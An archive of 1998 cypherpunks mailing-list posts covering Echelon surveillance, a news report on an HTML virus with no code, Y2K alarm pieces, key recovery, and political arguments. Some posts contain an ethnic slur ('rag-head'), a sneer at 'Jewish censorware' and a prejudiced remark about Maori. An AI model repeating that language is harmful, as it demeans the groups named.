"I don't believe that the NSA or the current
Administration would hesitate to use this system on
American citizens for their own agendas," he said. 

Outraged by this flagrant abuse of power illustrated by
our country's elected officials, Poole said, "While the
U.S. is the prime mover behind the Echelon system, it's
shameful that the European Parliament is the body
holding the constitutional debate in regards to Echelon
today." 

A September 1998 report for the European Parliament
by the Omega Foundation said, "Within Europe, all
e-mail, telephone, and fax communications are
routinely intercepted by the United States National
Security Agency. 

According to the Omega Foundation report, it is this
ability of the NSA that brings major concern to the
European Parliament. In an effort to bring the issues
surrounding Echelon to the forefront of American
politics, the Free Congress Foundation plans to send
out a report about Echelon to all of the 500 policy
organizations in the U.S. as well as to select members
of Congress. These select individuals include members
from both the House and Senate intelligence
committees as well as House and Senate Constitution
subcommittees. Copies of the report will also be sent
to the congressional leadership of both parties. 

Although the foundation is hoping to get some action
out of these members of Congress, Poole said that
support at the grassroots level of our nation's political
structure will be a must if this issue isn't to end up
buried by the intelligence committees. 

"For there to be any account and oversight to the
Echelon system, the American people are going to
have to contact their elected representatives in order to
investigate the abuses that we know have occurred in
regards to the Echelon system," Poole said. 

See Free Congress Foundation's report on Echelon. 
 (c) 1998 Western Journalism Center
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Nov 1998 08:54:42 +0800
To: cypherpunks@cyberpass.net
Subject: IP: WiredNews: Virus Thrives on HTML
Message-ID: <199811130028.QAA17302@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: WiredNews: Virus Thrives on HTML
Date: Thu, 12 Nov 1998 09:46:31 -0600
To: believer@telepath.com

Source:  Wired News
http://www.wired.com/news/news/technology/story/16206.html

Virus Thrives on HTML
 by Chris Oakes 

 5:53 p.m.11.Nov.98.PST
 An old computer invader has found a new place
 to thrive. 

 A virus-monitoring group this week posted a
 computer virus -- called "html.internal" -- that is
 the first to replicate itself through hypertext
 markup language, or HTML, the code that
 defines the common Web page. 

 "Looks like the virus crowd has finally discovered
 the Internet," said Richard Smith of Phar Lap
 Software. "HTML pages are extremely mobile....
 They're intended to be given out." 

 Other observers point out the demonstration
 virus requires specific Windows scripting
 software to carry out its task. They maintain that
 the virus, therefore, exposes the vulnerability of
 the secondary software, VisualBasic Script, not
 plain vanilla Web pages. 

 "It draws attention to the power that's available
 to the VBScript programmer," said Jimmy Kuo,
 director of antivirus research at Network
 Associates. 

 A computer virus typically spreads through
 shared files, such as word processing
 documents or email attachments. It most often
 consists of a program or piece of code that runs
 invisibly on any computer it manages to infect.
 Like any virus, it replicates itself. That replication
 can be threatening in itself if the virus is large,
 since it will quickly fill a computer's memory and
 cause a crash. 

 Viruses once depended mainly on floppy disks
 for their travels, but networks have introduced an
 easier path. 

 The HTML virus, created by the Virus Information
 Center and released on Tuesday, was built as a
 demo and does not present a large security risk
 in and of itself. It works through Internet Explorer
 4.0 and relies on the scripting feature, VBScript,
 built into the latest Microsoft PC operating
 system, Windows 98. If security warnings are
 ignored, the virus will load via a Web page and
 infect other Web pages on the host computer. 

 Protections already built into Internet Explorer
 4.0 would warn users if they encountered the
 virus, said a Microsoft spokeswoman. 

 Copyright (c) 1994-98 Wired Digital Inc. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Nov 1998 09:03:22 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Clinton Point-Man on 'Y2K' is Low-Balling Magnitude of the Impending Crisis
Message-ID: <199811130028.QAA17313@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Clinton Point-Man on 'Y2K' is Low-Balling Magnitude of the Impending Crisis
Date: Thu, 12 Nov 1998 11:12:41 -0600
To: believer@telepath.com

Source:  Center for Security Policy
http://www.security-policy.org/papers/1998/98-C181.html

Publications of the Casey Institute
 of the Center for Security Policy
 No. 98-C 181

 PERSPECTIVE 
 
5 November 1998

Whistling Past the Graveyard: Clinton Point-Man on 'Y2K' is Low-Balling
Magnitude of the Impending Crisis 

(Washington, D.C.): Today's Washington Post features an article about a few
of the problems besetting the U.S. government as it grapples, belatedly,
with the Year 2000 (or Y2K) "bug." In a perfect (if unintended) metaphor
for the trouble on this front now confronting the Clinton Administration --
and, thanks in no small measure to its absence of "leadership" on the
issue, the Nation -- the Post headline reads "Y2K Problem Poses Staffing
Challenges for Agencies." Yet, the caption on an accompanying photograph
quotes John Koskinen, the President's "czar" for the Millennium bug, as
saying: "Y2K staffing 'has not turned out to be a major issue at this
point, but we are continuing to monitor it.'" 

Shorthanded 

Unfortunately, the article proceeds to detail myriad examples that suggest
ways in which personnel problems are seriously interfering with the
government's Y2K remediation program. For example, the Post reports: 

 "In the scramble to fix computers for the Year 2000, federal agencies have
regularly complained that their technology experts were being lured away by
better-paying jobs and that qualified contractors were difficult to find." 

 "Of the 24 large agencies required to file quarterly or monthly Y2K
progress reports, 13 expressed worries about their computer staffing or
staff availability, according to a new General Accounting Office report." 

 "[According to the GAO] four agencies - the departments of Agriculture,
Justice and State and the Patent and Trademark Office - [are] facing
[acute] Year 2000 staff woes: project delays because of high turnover among
contractor staff and losses of skilled information technology employees
through retirements and increased recruitment by private-sector companies." 

A 'Major Issue', Indeed 

Mr. Koskinen's reassurances notwithstanding, the anecdotal evidence of
problems of ensuring compliance of the federal agencies is of great concern
for several reasons: 

 The government has historically had a much more difficult time than the
private sector hiring and retaining qualified workers in a competitive job
market. More often than not, the workers the government does retain have
skill sets deemed unimpressive (read, unemployable) by the private sector. 

 Given the complexity of undertaking a comprehensive assessment of the
extent of the Y2K-associated staffing problems, anecdotal evidence is all
there is to go on in calibrating the magnitude of such problems. 

 It is a well known fact that over 80% of all large high technology
projects are completed behind schedule. That the Clinton/Gore
Administration continues to assert that the job -- arguably, the largest
high technology project ever undertaken with an altogether inflexible
deadline -- will be done on-time defies historical experience, to say
nothing of common sense. 

Panic Prevention? 

The truth of the matter is that, even if the federal government were
experiencing no personnel problems in preparing for the Y2K "bug," the
Clinton Administration would still be dangerously "behind the power curve."
After all, far and away the toughest part of insuring federal agency
compliance with Y2K requirements will be the testing, re-remediation and
retesting phases -- work that has scarcely even begun in most agencies. 

In fact, what seems to be going on here is less crisis management than
panic management. Unfortunately, Czar Koskinen's wishful thinking about the
staffing problem is not an isolated incident. In public speeches, media
interviews and through other vehicles, he has consistently understated the
magnitude of the problem while substantially overstating the government's
preparedness for dealing with it.(1) 

Koskinen has plenty of company in the Clinton Administration, however.
Indeed, even on the one occasion last July, when (after months of refusing
to issue public warnings about the Y2K crisis) President Clinton and Vice
President Gore finally used the "bully pulpit" to raise an alarm about this
impending danger, they failed accurately to describe the severity of the
problem. They also refused to take any responsibility for the significant
contribution their lack of leadership to date has made to the Nation's Y2K
unpreparedness -- and, therefore, to the likely intensity of the coming
crisis.(2)  

The Bottom Line 

An insert next to the aforementioned Washington Post article on Y2K
staffing issues reports the Federal Reserve plans to release some $30-50
billion in additional reserves late in 1999. The reason: to ensure banks
will have sufficient money on hand to satisfy depositors who want to hold
their savings in cash on the 1st of January 2000. As of April of this year,
there was $3.6 trillion on deposit in U.S. banks. Those banks hold only
some $49 billion in cash reserves. Thus, even with the additional funds
available for withdrawal, banks will have at most only $2.70 for every $100
on deposit.  

The Clinton-Gore Administration is sorely mistaken if it believes a
potentially cataclysmic socio-economic crisis will be avoided if it
persists in misleading the American people. The only hope of preventing
such a panic-driven outcome is for the administration to provide steady,
honest leadership -- addressing candidly the unknown and greatly increasing
the priority given by both the private and public sector to accelerating
Y2K remediation and damage limitation efforts.  

 - 30 - 

1. See the Center's Decision Brief entitled At Last, Clinton-Gore
Publicly Address Year 2000 Bug -- But Continue to Lowball
Problem, Duck Responsibility For It (No. 98-C 132, 15 July
1998) and the Casey Institute's Perspective entitled New Theory
For Clinton-Gore Silence on Y2K Emerges As N.P.R., Gingrich
Offer Contrasting Views Of The Danger (No. 98-D 106, 12 June
1998). 

2. See the Center's Decision Brief entitled At Last, Clinton-Gore
Publicly Address Year 2000 Bug -- But Continue to Lowball
Problem, Duck Responsibility For It (No. 98-C 132, 15 July
1998). 

NOTE: The Center's publications are intended to invigorate
and enrich the debate on foreign policy and defense issues. The
views expressed do not necessarily reflect those of all members of
the Center's Board of Advisors.

(c) 1988-1998, Center for Security Policy
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Nov 1998 09:21:11 +0800
To: cypherpunks@cyberpass.net
Subject: y2k+nukes===???? (drudge)
Message-ID: <199811130049.QAA18857@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

Subject: MILLENNIUM BUG POSES NUCLEAR WEAPONS RISK /Drudge

MILLENNIUM BUG POSES NUCLEAR WEAPONS RISK 

The British American Security Information Council on Thursday is warning all
world military powers to de-activate their
weapons, to avoid possible "massive and hugely perilous systems failures"
brought on by the so-called Millennium bug. 

The group singles out the United States, bluntly describing the Pentagon's
efforts to meet the fast-approaching deadline
as "a mess" -- with what it calls "severe and recurring problems across the
spectrum." 

The INDEPENDENT newspaper in London on Thursday outlined the council's warning. 

"The biggest YK2 danger is not the ultimate nightmare of nuclear weapons either
launching or exploding because of faulty
computer information. Since it still requires human authorization for a missile
or warhead to be launched, this sort of
catastrophe is unrealistic. Far more likely, however, is the prospect of a
leader, under pressure from hairtrigger
response mechanisms, pressing the nuclear button on the basis of inaccurate
data." 

The council would like to see world powers "separate warheads from their
delivery vehicles" when the clocks flip 2000-- a
move that would dramatically increase the amount of time needed to launch an
attack. 

http://www.drudgereport.com/matt.htm

- - -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.inannareturns.com
"See God in Every Eye" --Inanna, Goddess of Love
V.S. Ferguson
author, Inanna Returns and Inanna Hyper-Luminal

- - --------------79A25852320ABAABB431D8E6--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 13 Nov 1998 09:34:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: GOST
Message-ID: <364B8752.6A0E8B33@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Scoops writes:
> I also remember a few weeks ago reports in the press and on the List of a
> porn ring broken up and some agent involved saying that the some porn was
> encrypted in an old KGB program which sounded much like GOST.

I saw this report also, and took it to be a standard journalistic garble.
It seems more likely to me that the package used by the child porn types
was Kremlin, which produces .kgb files.

-- 
	Jim Gillogly
	Trewesday, 23 Blotmath S.R. 1998, 01:09
	12.19.5.12.6, 11 Cimi 19 Zac, Third Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stewart, William C (Bill), BNSVC" <billstewart@att.com>
Date: Fri, 13 Nov 1998 08:56:44 +0800
To: cypherpunks@cyberpass.net
Subject: FW: Network Associates rejoins Key Recovery Alliance
Message-ID: <25683280FF49D2119B480000C0AD590058DFF4@mo3980po13.ems.att.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded via Dave Farber's list:
-----Original Message-----
From: Kathleen Ellis [mailto:ellis@epic.org]
Sent: Thursday, November 12, 1998 12:25 PM
To: cryptography@c2.net
Subject: Network Associates rejoins Key Recovery Alliance


As seen on Slashdot..

http://www.slashdot.org

Posted by blizzard on
Thursday November
12, @09:41AM from the gimme-your-data dept.

Andrew Hagen writes
"Network Associates, formerly McAfee, developer of PGP, has quietly rejoined
the Key Recovery Alliance. Despite withdrawing from the group last December
amid pointed concerns over the continued trustworthiness of PGP, NAI
apparently rejoined the Key Recovery Alliance (KRA) three months later with
their February 1998 acquisition of Trusted Information Systems, a founding
member of the KRA. The KRA's major stated goal is creation of "a global
infrastructure that supports recovery of encrypted information." NAI has
sent me e-mail stating that they might or might not remain in the KRA, that
"PGP products will not be affected," and that they have "no interest in
enabling key escrow for government access." Network Associates is presently
listed on the KRA membership roster."

Kathleen Ellis Admin. Dir., Electronic Privacy Information Center
     Voice Mail:  (202)298-0833	http://www.epic.org
Keep up with the latest encryption news and events:  http://www.crypto.org

PGP 5.0 Key ID 9bf725b4  65FF B997 62B8 C396 A527 2D6A 4901 F701 9BF7 25B4



_____________________________________________________________________
David Farber         
The Alfred Fitler Moore Professor of Telecommunication Systems
University of Pennsylvania 
Home Page: http://www.cis.upenn.edu/~farber     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 13 Nov 1998 02:30:07 +0800
To: cypherpunks@toad.com
Subject: Censorware
Message-ID: <199811121732.SAA18731@replay.com>
MIME-Version: 1.0
Content-Type: text/plain





So, does the ADL censor Farrakan?  

Will the white supremecists publish their own 
"screen" to keep their brood pure ?

Jewish censorware.  Gotta love the irony.

Time to re-fluoridate my precious bodily fluids.





Thursday November 12 10:32 AM ET 

ADL And Learning Co. Create Hate Filter

BOSTON (Reuters) - The Anti-Defamation League, which has been monitoring
hate groups for 85 years, has teamed up with educational software
maker The Learning Co. to create a filter that screens out hate sites on
the Internet.

Dubbed the ADL HateFilter and available from the ADL's Web site
(www.adl.org), parents can install the screen on home computers and thereby
keep
``bigotry and prejudice out of their homes,'' ADL National Chairman Howard
Berkowitz said.

The ADL HateFilter sits atop the Learning Co.'s Cyber Patrol product, a
filter that is used by both parents and teachers to block children's access to
Internet sites ''containing drug information, sexual text, nudity. Things
that parents may consider inappropriate for children,'' a spokeswoman for
Cambridge, Mass.-based software maker said.

The ADL HateFilter does not just screen hate sites, but also provides a
link to obtain information about the hate groups, the Learning Co.'s Susan
Getgood said.

``We've basically been doing this for 85 years, we just transferred the
information to the Internet,'' explained ADL spokeswoman Myrna Shinbaum.

The sites filtered are those that in the ADL's judgment advocate hatred,
bigotry or even violence toward Jews or other groups on the basis of their
religion, race, ethnicity, sexual orientation or other immutable
characteristics.

The ADL, founded in 1913, is holding its 85th annual National Commission
meeting in Boston. 

http://dailynews.yahoo.com/headlines/tc/story.html?s=v/nm/19981112/tc/filter
_1.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Fri, 13 Nov 1998 08:05:32 +0800
To: Jim Burnes - Denver <jim.burnes@ssds.com>
Subject: Re: most of what govts do can be done by business, and done better (Re: How to solve the tax problem w/o anarchy or force)
In-Reply-To: <Pine.SOL.3.91.981112122152.26521A-100000@denver>
Message-ID: <364B7672.8B6295A3@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Burnes - Denver wrote:
On Wed, 11 Nov 1998, Soren wrote:
> There is a real live example of this kind of transition.  New
Zealand.
>
much interesting info deleted
What kind of constitution and bill of rights does New Zealand have?
Check  this
out.
 
Do I have the right of gun ownership to protect myself or stop
tyrannical takeover?
That's very funny.  The US, the country that allows most gun ownership
(in the 1st world), is the most in need of that right to defend against
both illegal and legal criminals. So much for the value of the 2nd amendment.
To answer your question though, yes you have the right to buy a gun,
just as you have the right to buy a car (a far more lethal instrument in
general). You are held to account for what you do with it however (irrespective
of whether its a gun or car).  If you kill someone, then you are generally
arrested and tried for either murder or manslaughter. Manslaughter is the
usual charge if you shoot someone who was threatening to kill you. It all
depends on how successful they were in the attempt. Several cases of pissed
off people shooting neighbours who were merely harassing them, and getting
acquitted of any charges, exist.  Something like 10 murders a year
and climbing (fueled by the gangsta rap lovers amongst the maori, mostly.
Thank you USA!!). When most violent crime is of the form of being beaten
up in a bar, or surprizing a burglar and getting threatened with a club
or knife, responding with lethal force is considered not to be very sporting.
Hand guns are rare, but there are hand gun clubs.  Seems a lot
like a waste of energy to me, preparing for an event that is very unlikely
to occur in your lifetime.  Most gun owners are hunters, shooting
pig, deer, possums, elk .... Permits are not required. Bow hunting is also
quite popular.
New Zealand is a parliamentary democracy in the english tradition, with
only one house. Recently, MMP (similar to Germany's) system of representation,
was passed by referendum. This means that any candidate and/or party that
gets 5% of a popular vote, gets a seat in the parliament. The more 5%s
you get, the more seats.  Each citizen gets 2 votes.  One for
a candidate, and one for a party.  There are currently 6(ish) major
political parties.  Under MMP, proportional representation means that
the the elected candidates have to form a coalition government. I.e. they
all get together and make/break friendships until a clear winner/majority
is declared (a very public process). If a clear winner cannot be found,
another election is held until something gells. Once that happens, the
majority coalition designates a 'prime' minister and a cabinet of ministers,
to call the shots.  This is very unlike a presidential executive,
in that these ministers are, in effect, hired by the coalition government
and not directly elected to office.  Prime ministers do not have to
get impeached to remove them from office.  If the majority coalition
gets P.O'ed with any minister's track record, he gets fired.  If the
population gets P.O'ed with the winning coalition, the coalitions will
change to form a new government and new cabinet, to suit the mood(swing)
of the populace. This is a very adversarial system for a government to
operate under.  There are virtually no bi(multi-)partisan activities
(the last was the economic revolution in 1986).  Generally, the opposition
is always angling to destabilize the current majority coalition, with lots
of rhetoric flying in the press. Consequently, the majority coalition has
to keep on their toes and please the population.  Sometimes this leads
to some skullduggery and dishonest activities.  The population (and
press) have exactly zero tolerance for crooked politicians.  Typically,
a Member of Parliament who gets out of line, is out of office within the
month, often the week. Ergo, no real need for guns when you have a government
that can be dissolved at any time by either a new majority being formed,
or the population calling for an election.  Unpopular laws are generally
ignored, or become the cause for a new election. This happens on a regular
basis.
I always had a sneaking suspicion that basing the US republic on the
roman model, was not such a good idea.  Look what happened to them. 
(Hail Clinton!, long live the emperor! Only until the present emergency
lasts, honest! Those huns (drug dealers) and vandals (terrorists) have
to be defeated first).
Its hard to compare, how NZ's system works in practise, with the self-aggrandizing
and self-important poll-doll system in the US (bread and circuses). 
Mostly politicians in NZ are the guys who live next door, and who you go
fishing with.  They all have a distaste for overinflated egos. 
This is deeply ingrained in the national psyche, often to a fault (tall
poppy syndrome).  It is a nation of fiercely rugged individualism
(even at its collectivist height in the 1970s).  You are still considered
to be a wuss if you didn't build your own home, or don't fix your own car
or computer (or write your own crypto?), or have your own business, although
this is changing under the onslaught of US cultural imperialism and hamburger
diplomacy. As it's an island nation, 1 in 5 people has a boat, and generally
use it to go fishing.  Again, no permits necessary. A lot of people
also build their own boats, although this is changing ...  I suppose
the closest comparison in the US, would be to think of it as a cross between
Alaska and Hawaii.
Hope that answers your questions.  You should look around the NZ
web sites for more detail, or better yet, take a month or two and go and
check it out.  Christmas is fast approaching, which is the start of
summer and the holiday season, all rolled into one.
 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 13 Nov 1998 03:35:45 +0800
To: cypherpunks@toad.com
Subject: Re: acceptable user policies
Message-ID: <199811121838.TAA24992@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Yeah, let me give you the first rule of acceptable user policies.  Users
shall not spam a maillist multiple times with the same damn request,
because a) their question is a lot less likely to be answered by
annoyed listmembers, and b) said annoyed listmembers will probably
end up mailing the user's ISP and complaining, resulting in
disciplinary action against said abusive user.

Before you start formulating an acceptable user policy, why don't you
go spend some time in news.announce.newusers and learn some
netiquette.


At 03:11 PM 11/11/98 +0000, Duncan Licence wrote:
>hey there,
>
>	I am having to formulate an acceptable user policy for the users. Does 
>anybody know of any online references, or examples of such policies. 
>This would have to include specifications like email use, internet 
>access, games over the LAN - anything that you can get your head around 
>pertaining to such. This of course would have to weigh up between the 
>rights of the users and protection of the network and PCs
>
>
>	Your help would be greatly appreciated
>	Duncan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 13 Nov 1998 12:10:16 +0800
To: mxm@candseek.com
Subject: Re: JOBOP Software Engineer
In-Reply-To: <199811121859.KAA10445@toad.com>
Message-ID: <Pine.BSF.3.91.981112204351.12582A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




What kind of drugs go with the salary? 

(Most of the people on this list 
could use the side benefits.)

On Thu, 12 Nov 1998 mxm@candseek.com wrote:

> Since your address was listed on a software engineering 
> oriented site, I was hoping you could help me out. 
> 
> I am currently looking for individuals with a strong background 
> in C++ development on a Windows NT platform.
> 
> I represent a leader in software development for the pharmaceutical,
> cosmetic, and food industries specializing in customized 
> Manufacturing Execution Systems. For this exciting, growth 
> opportunity, I am looking for an individual to play a key role in 
> gathering requirements from clients and relaying that information 
> to an internal development team. In addition to acting as a 
> liaison, this individual will also participate in the development 
> of the system.
> 
> Position can work from Northern Virginia or Central Connecticut 
> and we will assist in relocation expenses.
> 
> An ideal candidate will have at least 3 years of experience conducting 
> C++ development on an NT platform. Communication skills are 
> also important due to the interaction with both internal and 
> external clients. Prior project management experience is a plus.
> 
> Salary to $90,000 with a generous benefits package.
> 
> If you know of anyone that might be interested, please forward 
> this email or contact me directly.
> 
> Thank You,
> 
> Megan McCullough
> 
> Diedre Moire Corporation
> 510 Horizon Center
> Robbinsville, NJ 08691
> (609) 584-9000ext275
> (609) 584-9575 (fax)
> mxm@candseek.com
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 13 Nov 1998 12:24:52 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811120647.AAA27853@einstein.ssz.com>
Message-ID: <v04011701b27102eb05ee@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:47 AM -0500 11/12/98, Jim Choate wrote:
>Forwarded message:
>> 	There are also certain types of crimes that are so morally
>> reprehensible that to allow them to continue is not possible.
>
>Absolutely, and each country should have it's right to choose it's own
>particular brand of reprehensibility recognized.
>
>> 	Or are you willing to go on record as stating that what Stalin did
>> to the Jews (or Hitler for that matter) was acceptable, since we shouldn't
>> have a say in their laws?
>
>Well, you have to understand I'm a pantheist. I know it's easy to shrug off
>and say "so what" but I can't answer this exactly unless you fundamentaly
>understand literal pantheism. But I'll try.
>
>I believe there is no transcendence. As a result everything is divine
>because that's all there is. To disrespect the uniqueness in anything is a

	That's a fancy way of saying you don't believe in anything. No
distinctions, nothing is moral, nothing is immoral.

>disservice to self. However, concepts of literal sin to my view simply don't
>exist. The killing of a human by a human is not fundamentaly (think of it as
>outside of human society, it's close but not close enough) different than a
>human killing a rabbit, or crushing a rock, or painting a picture. It's an

	So stealing is functionally equivalent to buying, rape is
equivalent to consent, and murder is just part of life.

	Then where the FUCK do you get off telling me that my "system" is
wrong because it will allegedly promote these things, if you aren't even
going to accept that they are wrong?

>activity, in and of itself it is nothing more than a cold, cosmic event
>mediated by complete and utter indifference. The universe does not act with
>anthropocentric motives or mechanations. However, within the concerns of

	Well, no shit sherlock. Lemme guess, youse is one o' dem Colledge
Boi's isnt' you?

>human biology, psychology, and society there is a very real distinction. As
>a matter of fact there are quite a few. Since they are all a construct of
>human existance they deserve some level of respect, the freedom of
>expression in speech and press, not necessarily in action. Because of the
>fundamental uniqueness of anything, to destroy or change it with willful
>intent (I wish I could express this better, all I can say is it isn't what
>normal English means by those two words exactly enough) except in
>self-defence or survival (eg killing an animal for food) is not moraly
>(permissible at the level of individual) or ethicaly (the range of
>permissible acts related to an activity, say a doctor or lawyer)
>supportable.

	So it isn't OK.

>I am willing to go on record stating that what they did from a national
>level should concern no nation that is not directly involved. Nations do not
>have the right to impose their will on other nations, period. Nations may of
>course dissolve and reform of their own free will and whim. From a personal
>level everyone should have run over there in about 1936 and kicked their
>stinking ass as volunteers (the fact that it is not in human nature to
>participate in mass exhibitions like this voluntarily is another reason that
>anarcho-whatevers won't work). From a fundamentaly cosmic perspective what
>they did is completely and utterly irrelevant and of no consequence. At the
>same time I'm horrified that human beings can do that to other people and
>live with themselves. The total lack of empathy I find utterly chilling.
>Poppy Z. Brite in carnate.

	You are one confused puppy. You are saying that it would be wrong
for nations to get involved, because it isn't any of their business, but it
is ok, and in fact proper for PEOPLE to get involved.

	What are nations? People. People acting in agregate. If a the
people have a right, or a responsibility to act, then they have the right
to request that their nation act as their proxy (which after all is what
nations are allegdely for according to your theory of government) in
resolving their problem.


>Let me give you another example, unless the US is attacked directly by Iraq
>we have no business threatening, let alone initiating, violence.

	I disagree. If we find that their country is gassing people, we
have a responsibility to intervene. My problem with our actions is that it
is not done on the principle of preventing the genocide of a people, but on
the principle that we need instability in the Middle East to keep cheap oil
for us.

>But I'll do what I did the last time we got in a scrap with the rag-head,
>whatever I can. To do any less might cost somebody their life through my

	Whatever you can do to what end. to continue to support a state of
affairs that does nothing but lead in a circle? To continue to support the
murder of a people (the kurds) and the threat of the release of Biological
and Chemical toxins in Isreal (which probably diserves to get the shit
kicked out of it a time or two for it's arrogance and it's facist ways, but
NBC warfare is rather rude and nasty).

>Does that help any better? Life is a contradiction in motion.

	Crap. There can be no contradictions. One must find and resolve them.

>> >Do you want Germany having a say in our laws (for example)?
>> 	They do already, it's called international trade.
>Me selling apples to a German doesn't involve their having a say in my law
>making unless I'm an idiot in making the laws I operate under. There are
>treaties, but the assumption is that they are entered into freely and with
>comprehension. If they don't and do well that's their problem.

	Economics drives laws.

>> 	Also, if I were a Catholic in a death camp because Jesse Helms
>> ramed thru legislation blaming the Y2K bug on the Holy C, I'd hope someone
>> would intervine.
>
>Congress can't make laws respecting establishments of religion. Not only
>can't they support any, they can't prohibit any, they can't even
>constitutionaly decide what a religion is. Per the 10th that is left to the
>individual states and their respective representative constitutions.

	Did you duck, or did I just aim right over your head?

>> 	But you claimed it started in the early 1900's in response to
>> deaths and blindness.
>
>The regulation of the manufacture and sales of alcohol started after the
>civil war, late 1800' and early 1900's depending on your geography. It's
>impossible to set a single date since the various laws were'not all initiated
>at the same time. I believe somebody else is the person who equated
>prohibition with regulation. In general the laws were put in place because
>either there was a problem with tainted alcohol (this was a real problem in
>the very early 1900's because of the use of lead pipes and other amalgams
>that don't treat people nicely) or excessive consumption by the youth

	The use of lead pipes was because we didn't know better until then.
Time and education would have solved that problem as well as any law. Most
business (especially smaller local type businesses) don't want their
customers falling down dead, it tends to decrease business.

>The history of alcohol is long and twisted.

	Kinda like your arguments.

>> 	It prevents the press from manipulating the government because
>> there ISN'T ONE, or if there is (in the case of extreme
>> libertarian/minarchist) it is so restricted and powerless it can't do
>> anything execpt try to gather more power.
>
>True, but then the news papers (they are not the same as the press - where
>that commen misconception is from is beyond my keen) would just pander to

	Ever seen a newpaper in production? They are run on things called
"presses", and for many years (1600's, 1700's and 1800's, until the wide
spread adpotion of radio) they were the primary (only) source of news. That
is probably where the name "The Press" comes from, and why the first
amendment attempts to claim freedom for it.

>their extant major supporter, advertisers. How honest do you think that
>would make them? Not very. If given the choice between the truth or a fatter
>check newspapers (and their reporters) have in general chosen the way of the
>greenback.

	While one can point to isolated incidences of that happening, the
most honest accusation one can point at the press is that they tend to
report what is happening in a way that will sell newspapers rather than
slant stories to avoid pissing off potential advertisers. There are simply
too many advertisers to worry about.

	They might kill the occasional story, but in a competitive market,
of the opposition believes that there is a market for the story, it'll get
told.

>Jefferson said he would never write a line in a newspaper, and didn't. He
>thought them vile. He however held the free press (he meant unrestrained
>communication between individuals) in high regard (obviously).

	I'd imagine he held certain types of Newspapers in low regard,
probably the 1700's version of Weekly World News.

	There just wasn't a whole lot else being printed back then.

>> 	Yes, businesses can manipulate the press, and do-gooders can always
>> start their own press and fight back.
>
>Who do they buy the press parts from? The ink and paper? The distribution
>channles? Etc. You might be able to start one up but you won't last long in
>a monotonicly profit driven free-market. If they rake muck too much they
>won't have a rake anymore.

	These days just set up a web site. Other than that, it's fairly
easy technically to start a "press", you just get something you want
printed typeset (or do it yourself) and pay a press to print it.

	That is no excuse.

>> 	Yeah, and there are laws against Drug Dealing which work real well.
>There's probably a lesson in there somewhere...

	Yeah, laws don't work real good.


>> 	I wanna say Karen something or other as one case--Silkwood?
>That was one of the ones I was thinking of.

>> 	Point still holds, you speak out, you get in trouble, legal or no.
>> Laws don't prevent things from happening, they simply give society the
>> moral authority to say "We Warned You, Now Off With His Head" or some such.
>They moderate and mediate those actions and in fact do set a limit on what
>can occur at the social level. I'll say it again, government isn't for
>regulating individual interactions at the daily level. It's simply too fine
>grain. It will control trends and behaviours with a good deal of aplomb (if

